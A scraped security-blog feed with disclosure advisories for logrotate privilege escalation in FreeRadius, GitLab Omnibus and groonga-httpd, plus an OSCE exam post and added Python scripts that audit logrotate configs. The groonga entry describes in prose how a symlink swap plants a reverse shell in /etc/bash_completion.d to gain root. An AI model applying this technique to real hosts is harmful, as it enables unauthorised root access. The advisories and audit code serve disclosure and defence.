already achieved a valid shell as user “radiusd” could elevate the privileges to “root”. 
The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h4>Mitigation</h4> <p>Add “su radiusd:radiusd” to all log sections in /etc/logrotate.d/radiusd.<br /> Keeping SELinux in "Enforcing" mode limits the directories the “radiusd” user can write to.</p> <h4>References:</h4> <ul> <li><a href="https://access.redhat.com/security/cve/cve-2019-10143">https://access.redhat.com/security/cve/cve-2019-10143</a></li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a></li> </ul> <h4>Vendor Contact Timeline</h4> <p>2019-05-01: Contacting RedHat</p> <p>2019-05-07: RedHat opens an issue at the vendor bugtracker</p> <p>2019-05-23: CVE gets assigned to the issue</p> <p>2019-05-24: FreeRadius is skeptical about the “security” impact.</p> <p>2019-11-05: Public disclosure</p> <h4>Notes</h4> <p>This CVE is disputed because the vendor <a href="https://freeradius.org/security/">stated</a> that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user “radiusd”. CVEs are not only assigned for vulnerabilities but also for exposures that allow an attacker to have a stronger impact after a successful attack.
Therefore we believe that it is important to file this issue as a security-related bug.</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius">https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span>
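As an added defensive check (not code from the advisory, FreeRadius, GitLab or logrotate), the following script audits logrotate configuration fragments for the pattern the FreeRadius advisory describes and the GitLab Omnibus advisory (CVE-2019-15741) on this page shares: a log path whose parent directory is owned by a non-root user while the section is rotated as root without an "su" directive. The sample configuration and the directory ownership map are constructed to mirror the quoted /etc/logrotate.d/radiusd section; the ownership of /var/log/radius itself is assumed.

```python
"""Audit logrotate configs for the unsafe interaction described above: a section
rotated as root (no "su" directive) whose log directory is owned by a less
privileged user. Added example; not code from the advisory, FreeRadius or logrotate."""
import os
import pwd
from typing import Callable, Dict, List, Optional, Tuple

GLOB_CHARS = set("*?[")

def static_prefix(pattern: str) -> str:
    """Longest glob-free directory prefix: /var/log/radius/radacct/*/detail ->
    /var/log/radius/radacct; a literal path like /var/log/messages -> /var/log."""
    parts = pattern.split("/")
    kept: List[str] = []
    for part in parts:
        if GLOB_CHARS & set(part):
            break
        kept.append(part)
    if len(kept) == len(parts):  # no glob at all: drop the file name
        kept = kept[:-1]
    return "/".join(kept) or "/"

def parse_logrotate(text: str) -> Tuple[Dict[str, List[str]], List[dict]]:
    """Line-oriented parse into (global directives, sections); each section is
    {"paths": [...], "directives": {name: [args]}}. Script bodies are not interpreted."""
    global_directives: Dict[str, List[str]] = {}
    sections: List[dict] = []
    pending: List[str] = []
    current: Optional[dict] = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if current is None:
            if "{" in line:  # "path [path ...] {" opens a section
                pending += line.split("{", 1)[0].split()
                current = {"paths": pending, "directives": {}}
                pending = []
            elif line.startswith("/"):  # paths may precede the brace
                pending += line.split()
            else:
                name, *args = line.split()
                global_directives[name] = args
        elif line == "}":
            sections.append(current)
            current = None
        else:
            name, *args = line.split()
            current["directives"][name] = args
    return global_directives, sections

def directory_owner(path: str) -> Optional[str]:
    """Owner of a directory on the running host; None if it cannot be stat'ed."""
    try:
        return pwd.getpwuid(os.stat(path).st_uid).pw_name
    except (OSError, KeyError):
        return None

def audit_logrotate(text: str, owner_of: Callable[[str], Optional[str]] = directory_owner) -> List[dict]:
    """One finding per log pattern that root would rotate inside a directory owned
    by a non-root user, who can then swap that directory for a symlink."""
    global_directives, sections = parse_logrotate(text)
    findings = []
    for section in sections:
        # logrotate documents "su user group"; the advisory writes it as
        # "su radiusd:radiusd", so the colon form is accepted here as well.
        su = section["directives"].get("su", global_directives.get("su"))
        su_user = su[0].split(":")[0] if su else None
        if su_user not in (None, "root"):
            continue  # rotation drops privileges, so the directory owner gains nothing
        for pattern in section["paths"]:
            directory = static_prefix(pattern)
            owner = owner_of(directory)
            if owner is not None and owner != "root":
                findings.append({"pattern": pattern, "directory": directory, "owner": owner})
    return findings

# Constructed sample: the /etc/logrotate.d/radiusd section quoted in the advisory,
# beside a second section that applies the recommended "su" mitigation.
SAMPLE_CONFIG = """
/var/log/radius/radacct/*/detail {
    monthly
    rotate 4
    nocreate
    missingok
    compress
}
/var/log/radius/radius.log {
    monthly
    rotate 4
    su radiusd radiusd
}
"""
# Constructed ownership map standing in for os.stat() on a FreeRadius host.
SAMPLE_OWNERS = {"/var/log/radius/radacct": "radiusd", "/var/log/radius": "radiusd"}

if __name__ == "__main__":  # on a live host: audit_logrotate(open("/etc/logrotate.d/radiusd").read())
    for f in audit_logrotate(SAMPLE_CONFIG, SAMPLE_OWNERS.get):
        print(f"UNSAFE: {f['pattern']} is rotated as root but {f['directory']} belongs to {f['owner']}")
```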
I "tried harder" and passed another exam https://tech.feedyourhead.at/content/osce <span class="field field--name-title field--type-string field--label-hidden">I &quot;tried harder&quot; and passed another exam</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="osce emblem" data-entity-type="file" data-entity-uuid="0c71047f-4663-40f4-989e-5d8fb52257bb" height="88" src="/sites/default/files/inline-images/offsec-student-certified-emblem-rgb-osce.png" width="687" /></p> <p>The <a href="https://www.offensive-security.com/ctp-osce/">"Offensive Security Certified Expert" (OSCE)</a> is earned by passing an extraordinary exam after the "Cracking The Perimeter" course. <a href="https://tech.feedyourhead.at/content/oscp">The OSCP (Offensive Security Certified Professional)</a> is strongly focused on pentesting. Compared to the OSCP, the OSCE is more about writing exploits. Students learn about <a href="https://www.offensive-security.com/documentation/cracking-the-perimeter-syllabus.pdf">exploiting web vulnerabilities, anti-virus evasion, fuzzing, buffer overflows and exploiting network vulnerabilities</a>. After the course I was very proficient in using a debugger like Immunity Debugger or OllyDBG. The OSCE course is different from the OSCP. In the OSCP you have a big lab to practice in, and this guides you in what you have to learn and figure out by yourself. In the OSCE there are a couple of machines and some exercises. You have to find out by yourself how to get a deep understanding of the methods that are used in those exercises.</p> <p>The 48-hour exam was very hard for me. Even though I found some sleep, I really needed most of the time to solve the exercises.
In the end I passed the exam on my first attempt. My recommendations for people who want to pass the OSCE are: do the OSCP first, because it prepares you for the OSCE. Go through the <a href="https://www.pentesteracademy.com/course?id=3">SLAE32</a> to practice assembler and shellcoding. During and after the course, practice a lot and think about variations of the methods and exploits so that you get a very deep understanding of each course module.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Nov 10 2019</span>
Fifth Anniversary https://tech.feedyourhead.at/content/fifth-anniversary <span class="field field--name-title field--type-string 
field--label-hidden">Fifth Anniversary</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I started this blog five years ago. In the beginning I wrote mostly articles about sysadmin and programming. Now it's also filled with security-related stuff. It's fascinating for me to have a history of my interests. Sadly, my spare time has become scarce, so I haven't written much lately. My intention for the next 5 years is to be more consistent about writing articles.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Nov 07 2019</span>
CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741 <span class="field field--name-title field--type-string field--label-hidden">CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>Identifier: AIT-SA-20190930-01</li> <li>Target: GitLab Omnibus</li> <li>Vendor: GitLab</li> <li>Version: 7.4 through 12.2.1</li> <li>Fixed in Version: 12.2.3, 12.1.8 and 12.0.8</li> <li>CVE: CVE-2019-15741</li> <li>Accessibility: Local</li> <li>Severity: Low</li> <li>Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</li> </ul><h3>Vulnerability Description</h3> <p>GitLab Omnibus sets the ownership of the log directory to the system user "git", which might let local users obtain root access because of an unsafe interaction with logrotate.</p> <h3>Vulnerable Versions</h3> <p>7.4 through 12.2.1</p> <h3>Impact</h3> <p>An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”.
The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h3>Advisory URL</h3> <p><a href="http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus">http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus</a></p> <h3>References:</h3> <ul><li><a href="https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/">https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/</a></li> <li><a href="https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380">https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380</a></li> <li><a href="https://hackerone.com/reports/578119">https://hackerone.com/reports/578119</a></li> </ul></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 04 2019</span> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden 
comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=279&amp;2=comment&amp;3=comment" token="tPzTCpXOHPQznS0cKjokuCN09WJl_ncAA7gp79vmOxc"></drupal-render-placeholder> </section> Fri, 04 Oct 2019 11:25:05 +0000 Hoti 279 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741#comments https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741#comments Privilege escalation in groonga-httpd (CVE-2019-11675) https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd <span class="field field--name-title field--type-string field--label-hidden">Privilege escalation in groonga-httpd (CVE-2019-11675)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: Debian packages of groonga/-httpd 6.1.5-1</li> <li>Software-Version: 6.1.5-1</li> <li>User-Interaction: Not required</li> <li>Impact: Local root</li> <li>CVE: CVE-2019-11675</li> </ul> <h3>Detailed Description</h3> <p>The path of the logdirectory of groonga-httpd can be manipulated by user groonga:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>groonga total <span style="color: #000000;">8</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root 
root <span style="color: #000000;">1296</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> groonga.log drwxr-xr-x <span style="color: #000000;">2</span> groonga groonga <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">55</span> httpd</pre></div></pre> <p>The files in /var/log/groonga/httpd/*.log are once a day rotated by logrotate as user root with the following config:</p> <pre> /var/log/groonga/httpd/*.log { daily missingok rotate 30 compress delaycompress notifempty create 640 groonga groonga sharedscripts postrotate . /etc/default/groonga-httpd if [ x"$ENABLE" = x"yes" ]; then /usr/bin/curl --silent --output /dev/null \ "http://127.0.0.1:10041/d/log_reopen" fi endscript } </pre> <p>Due to <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">logrotate is prone to a race-condition</a> it is possible for user "groonga" to replace the directory /var/log/groonga/httpd with a symbolik link to any directory(for example /etc/bash_completion.d). logrotate will place files AS ROOT into /etc/bash_completition.d and set the owner and group to "groonga.groonga". An attacker could simply place a reverse-shell into this file. 
As soon as root logs in and bash completion sources the file, the reverse shell is executed.</p> <h3>Exploit</h3> <p>A proof-of-concept exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <h3>Mitigation</h3> <p>The problem can be mitigated by changing the owner and group of /var/log/groonga to root, so that the user groonga can no longer replace the directory, or by using the "su" option inside the logrotate config file, so that the rotation no longer runs as root.</p> <h3>Credits</h3> <p>This bug was discovered by Wolfgang Hotwagner (<a href="https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd">https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd</a>)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> Tue, 07 May 2019 20:32:56 +0000 Hoti 278 at https://tech.feedyourhead.at
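<p>Both advisories above share one precondition: logrotate runs as root over logs whose directory tree is owned by a service account ("git" for GitLab Omnibus, "groonga" for groonga-httpd) and the stanza carries no "su" directive. The following audit script, added here as an example and not code from either advisory or from the logrotten project, checks a logrotate configuration for exactly that condition. It parses the groonga-httpd stanza quoted on this page plus a hardened copy with "su" added; the ownership table, the uid 108 for the groonga account, and the assumption that /var/log/groonga itself is groonga-owned (which the page's chown mitigation implies) are constructed for the example. On a live host, pass host_owner instead of the table.</p>

```python
"""Audit logrotate stanzas for the pattern behind CVE-2019-11675 (groonga-httpd)
and CVE-2019-15741 (GitLab Omnibus): logs rotated as root out of a directory
tree owned by a service account, with no `su` directive.
Added example, not code from the advisories or from logrotate. It parses the
subset of logrotate syntax the stanza on this page uses and takes directory
ownership from a caller-supplied lookup, so it runs offline on constructed data."""
import os
import re
import stat
from typing import Callable, List, Optional, Tuple

Owner = Tuple[int, int, int]                      # (uid, gid, st_mode)
OwnerLookup = Callable[[str], Optional[Owner]]    # path -> Owner, None if missing


def parse_logrotate(text: str) -> List[Tuple[List[str], Optional[Tuple[str, str]]]]:
    """Return (patterns, su) per `pattern... { ... }` stanza. Script bodies
    (postrotate ... endscript) are skipped; braces inside them are not handled."""
    stanzas = []
    for m in re.finditer(r"([^{}]+?)\{(.*?)\}", text, re.S):
        su, in_script = None, False
        for line in (ln.strip() for ln in m.group(2).splitlines()):
            if not line or line.startswith("#"):
                continue
            if in_script:
                in_script = line != "endscript"
                continue
            tok = line.split()
            if tok[0] in ("prerotate", "postrotate", "firstaction", "lastaction", "preremove"):
                in_script = True
            elif tok[0] == "su" and len(tok) == 3:
                su = (tok[1], tok[2])
        stanzas.append((m.group(1).split(), su))
    return stanzas


def controllable_by_non_root(info: Owner) -> Optional[str]:
    """Reason if a directory with this ownership can be renamed or replaced
    by a non-root user (the precondition for the logrotate symlink swap)."""
    uid, gid, mode = info
    if uid != 0:
        return f"owned by uid {uid}"
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        return "world-writable without sticky bit"
    if mode & stat.S_IWGRP and gid != 0:
        return f"group-writable by gid {gid}"
    return None


def audit(text: str, owner_of: OwnerLookup, trusted_root: str = "/var/log") -> List[Tuple[str, str]]:
    """(directory, reason) for every path component between trusted_root and a
    rotated log that a non-root user controls while root does the rotation."""
    hits = set()
    for patterns, su in parse_logrotate(text):
        if su is not None:
            continue            # rotation drops to that user; a symlink swap gains nothing
        for pattern in patterns:
            d = os.path.dirname(pattern)
            while d.startswith(trusted_root + "/"):
                info = owner_of(d)
                reason = controllable_by_non_root(info) if info else None
                if reason:
                    hits.add((d, reason))
                d = os.path.dirname(d)
    return sorted(hits)


def host_owner(path: str) -> Optional[Owner]:
    """Ownership lookup for a live host, e.g. audit(open(cfg).read(), host_owner)."""
    try:
        s = os.stat(path)
    except FileNotFoundError:
        return None
    return (s.st_uid, s.st_gid, s.st_mode)


# Constructed sample: the groonga-httpd stanza quoted on this page, then the
# same logs with the `su` mitigation applied.
SAMPLE_CONFIG = """
/var/log/groonga/httpd/*.log {
    daily
    missingok
    rotate 30
    compress
    delaycompress
    notifempty
    create 640 groonga groonga
    sharedscripts
    postrotate
        . /etc/default/groonga-httpd
        if [ x"$ENABLE" = x"yes" ]; then
            /usr/bin/curl --silent --output /dev/null "http://127.0.0.1:10041/d/log_reopen"
        fi
    endscript
}
/var/log/groonga-fixed/httpd/*.log {
    daily
    su groonga groonga
    create 640 groonga groonga
}
"""
# Constructed ownership table standing in for os.stat(); uid 108 plays the
# groonga account. /var/log/groonga being groonga-owned is the assumption
# behind the page's "chown /var/log/groonga to root" mitigation.
SAMPLE_OWNERS = {
    "/var/log/groonga": (108, 108, 0o40755),
    "/var/log/groonga/httpd": (108, 108, 0o40755),
    "/var/log/groonga-fixed": (108, 108, 0o40755),
    "/var/log/groonga-fixed/httpd": (108, 108, 0o40755),
}

if __name__ == "__main__":
    for d, why in audit(SAMPLE_CONFIG, SAMPLE_OWNERS.get):
        print(f"UNSAFE {d}: {why} (chown to root, or add `su` to the stanza)")
```

<p>The walk up to the trusted root matters: in the groonga case the directory that must be swappable is /var/log/groonga, one level above the rotated files, which is why the page's mitigation chowns that directory rather than httpd. The hardened stanza is not reported even though its tree is still groonga-owned, because with "su groonga groonga" the file logrotate creates is no longer created as root.</p>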